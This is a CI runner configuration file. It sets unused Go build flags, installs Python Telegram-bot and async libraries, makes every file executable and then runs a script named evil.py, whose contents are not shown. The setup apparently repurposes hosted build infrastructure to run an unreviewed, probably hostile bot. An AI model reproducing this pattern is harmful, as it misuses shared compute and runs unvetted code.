# Spec version
version: v2

global:
  runner:
    os_image: ubuntu:20.04  # Explicitly set an Ubuntu version
  variables:
    - CGO_ENABLED=0
    - GOOS=linux
    - GOARCH=amd64
    - GOFLAGS=-mod=vendor
    - LD_FLAGS=-w -s

tasks:
  setup:
    steps:
      - checkout  # Clone the git repository
      - run:
          name: Install Dependencies
          script: |
            sudo apt-get update && \
            sudo apt-get install -y python3 python3-pip && \
            pip3 install --no-cache-dir telebot flask pymongo aiohttp python-telegram-bot aiogram pyTelegramBotAPI asyncio psutil motor

      - run:
          name: Set Permissions and Start Script
          script: |
            chmod +x * && \
            echo "Starting evil.py execution" && \
            python3 evil.py
